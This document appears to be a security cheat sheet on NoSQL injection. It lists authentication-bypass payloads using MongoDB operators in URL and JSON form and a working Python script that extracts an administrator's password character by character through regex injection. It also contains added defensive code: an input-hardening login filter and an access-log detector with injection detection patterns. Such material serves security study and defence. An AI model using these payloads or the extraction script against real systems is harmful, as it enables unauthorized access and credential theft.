NoSQL injection

NoSQL injection is a vulnerability where an attacker is able to interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:

  • Bypass authentication or protection mechanisms.

  • Extract or edit data.

  • Cause a denial of service.

  • Execute code on the server.

Auth bypass

#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }

Regex to bypass

{
   "username":{
      "$regex":"^admi*"
   },
   "password":{
      "$ne":"^.*"
   }
}
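Defender's view of the payloads above, as an added example (not code from the original page): it reproduces how bracket notation in a query string and operator objects in a JSON body both end up as `$`-keyed dicts, shows the filter-building pattern that makes them exploitable, and beside it a hardened version that enforces plain-string credentials and rejects any `$` key. The bracket-notation parser is an assumption about how the target framework decodes input, written inline so the example runs without a web stack or a MongoDB server.

```python
import json
import re
from urllib.parse import parse_qsl

# Keys starting with "$" are MongoDB query operators ($ne, $regex, $gt, $exists, ...).
OPERATOR_KEY = re.compile(r"^\$")


def parse_bracket_query(query_string):
    """Parse 'a[b]=1&c=2' into {'a': {'b': '1'}, 'c': '2'}.

    Assumption: the application's framework expands bracket notation in query
    strings and form bodies like this, which is what turns username[$ne]=toto
    into an operator object before it reaches the database driver.
    """
    result = {}
    for raw_key, value in parse_qsl(query_string, keep_blank_values=True):
        parts = [p for p in re.split(r"\[([^\]]*)\]", raw_key) if p != ""]
        if not parts:
            continue
        node = result
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return result


def contains_operator(value):
    """Recursively check whether a decoded value carries a "$"-prefixed key."""
    if isinstance(value, dict):
        return any(OPERATOR_KEY.match(str(k)) or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def vulnerable_login_filter(params):
    """The exploitable pattern: decoded input goes straight into the filter,
    so {"$ne": null} or {"$regex": "^admi*"} are executed as operators."""
    return {"username": params.get("username"), "password": params.get("password")}


def hardened_login_filter(params):
    """Return an equality-only filter, or None when the input is rejected.

    Two independent checks: both credentials must be plain strings (an operator
    object arrives as a dict, never a str), and no "$" key may appear anywhere
    in the decoded input, including nested or unrelated fields.
    """
    username = params.get("username")
    password = params.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    if contains_operator(params):
        return None
    # $eq keeps the comparison explicit even if a later change relaxes the type check.
    return {"username": {"$eq": username}, "password": {"$eq": password}}


def login_filter_from_request(body=None, query_string=None):
    """Entry point for a JSON body or a URL query string; None means rejected."""
    params = json.loads(body) if body is not None else parse_bracket_query(query_string)
    return hardened_login_filter(params)


if __name__ == "__main__":
    for qs in ("username[$ne]=toto&password[$ne]=toto",
               "username[$regex]=.*&password[$regex]=.*",
               "username=alice&password=hunter2"):
        params = parse_bracket_query(qs)
        print(qs, "->", vulnerable_login_filter(params),
              "| hardened:", hardened_login_filter(params))
    for body in ('{"username": {"$ne": null}, "password": {"$ne": null}}',
                 '{"username": {"$regex": "^admi*"}, "password": {"$ne": "^.*"}}',
                 '{"username": "alice", "password": "hunter2"}'):
        print(body, "->", login_filter_from_request(body=body))
```

The type check alone already stops every payload listed above, because each of them needs a dict where the code expects a string; the recursive `$`-key scan is the second layer for fields the type check does not cover. Note that the `{"$gt": undefined}` variant is not valid JSON, so `json.loads` rejects it before either check runs; a JavaScript body parser may accept it.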

Exfiltrate password using regex script

import requests

# Base URL for the target
base_url = "https://tareget.com/user/lookup"

# Session cookie (modify this with your actual session cookie)
cookies = {
    'session': 'COOKIE_HERE',
}

# Characters to test (extend this as needed)
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# Starting point for the password
password = ""

# Function to test a given prefix
def test_prefix(prefix):
    # The query string is built by hand, so it is appended to the URL directly
    # rather than passed through requests' params= (which would re-encode it)
    injection = f"?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^{prefix}.*$/)%00"
    response = requests.get(base_url + injection, cookies=cookies)
    return "administrator" in response.text

# Iteratively build the password
while True:
    found_char = False
    for char in characters:
        test_pass = password + char
        if test_prefix(test_pass):
            password += char
            print(f"Found character: {char} -> Current password: {password}")
            found_char = True
            break
    if not found_char:
        print("Password extraction complete!")
        break

print(f"The password is: {password}")
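Detection side of the same technique, as an added example that is not part of the original page: a scan over web-server access logs that flags the operator and `$where`-style indicators from the payloads on this page, and recognises the one-character-at-a-time probing the script above generates by tracking how many distinct regex prefix lengths a single client has sent. The log lines are constructed, and the Apache-style line format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "common" style access-log line (assumption about the log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Indicators of operator injection or $where/JavaScript injection, checked on the
# URL-decoded target so encodings such as %26%26 (&&) and %00 do not hide them.
INDICATORS = {
    "operator_key": re.compile(r"\[\$[a-z]+\]", re.I),      # username[$ne]=toto
    "operator_json": re.compile(r'"\$[a-z]+"\s*:', re.I),    # {"$ne": ...} inside a parameter
    "js_this_ref": re.compile(r"\bthis\.[a-z_]+", re.I),      # this.password in a $where clause
    "js_match_regex": re.compile(r"\.match\(/"),               # .match(/^a.*$/)
    "null_byte": re.compile(r"\x00"),                          # %00 truncating the query
}
# Captures the guessed prefix from a probe of the form /^<prefix>.*$/
PREFIX_PROBE = re.compile(r"/\^([^.]*)\.\*\$/")

# Constructed sample log: one normal lookup, one operator-injection login and a
# short run of the character-by-character probes the exfiltration script sends.
SAMPLE_LOG = r'''
10.0.0.9 - - [12/Mar/2024:10:00:01 +0000] "GET /user/lookup?user=alice HTTP/1.1" 200 812
10.0.0.9 - - [12/Mar/2024:10:00:07 +0000] "POST /login?username[$ne]=toto&password[$ne]=toto HTTP/1.1" 302 0
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /user/lookup?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^a.*$/)%00 HTTP/1.1" 200 12
10.0.0.5 - - [12/Mar/2024:10:01:03 +0000] "GET /user/lookup?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^b.*$/)%00 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:04 +0000] "GET /user/lookup?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^ba.*$/)%00 HTTP/1.1" 200 12
10.0.0.5 - - [12/Mar/2024:10:01:05 +0000] "GET /user/lookup?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^bc.*$/)%00 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:06 +0000] "GET /user/lookup?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^bca.*$/)%00 HTTP/1.1" 200 512
'''.strip().splitlines()


def scan_line(line):
    """Return (ip, timestamp, indicators, prefix) or None when nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(target))
    if not hits:
        return None
    probe = PREFIX_PROBE.search(target)
    return m.group("ip"), m.group("ts"), hits, (probe.group(1) if probe else None)


def analyze(lines, min_prefix_lengths=3):
    """Aggregate findings per client. extraction_pattern is set when one client
    sent regex probes at min_prefix_lengths or more distinct prefix lengths,
    the signature of rebuilding a secret one character at a time."""
    per_ip = defaultdict(lambda: {"hits": 0, "indicators": set(), "prefix_lengths": set()})
    for line in lines:
        found = scan_line(line)
        if found is None:
            continue
        ip, _, hits, prefix = found
        entry = per_ip[ip]
        entry["hits"] += 1
        entry["indicators"].update(hits)
        if prefix is not None:
            entry["prefix_lengths"].add(len(prefix))
    return {
        ip: {
            "flagged_requests": e["hits"],
            "indicators": sorted(e["indicators"]),
            "extraction_pattern": len(e["prefix_lengths"]) >= min_prefix_lengths,
        }
        for ip, e in per_ip.items()
    }


def run_sample():
    return analyze(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, finding in run_sample().items():
        print(ip, finding)
```

Access logs only carry the query string, so JSON-body payloads need the same indicators applied at the application or WAF layer where the body is visible. The prefix-length heuristic is deliberately independent of response sizes: the probing shows up whether or not the application's true/false responses differ in length.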
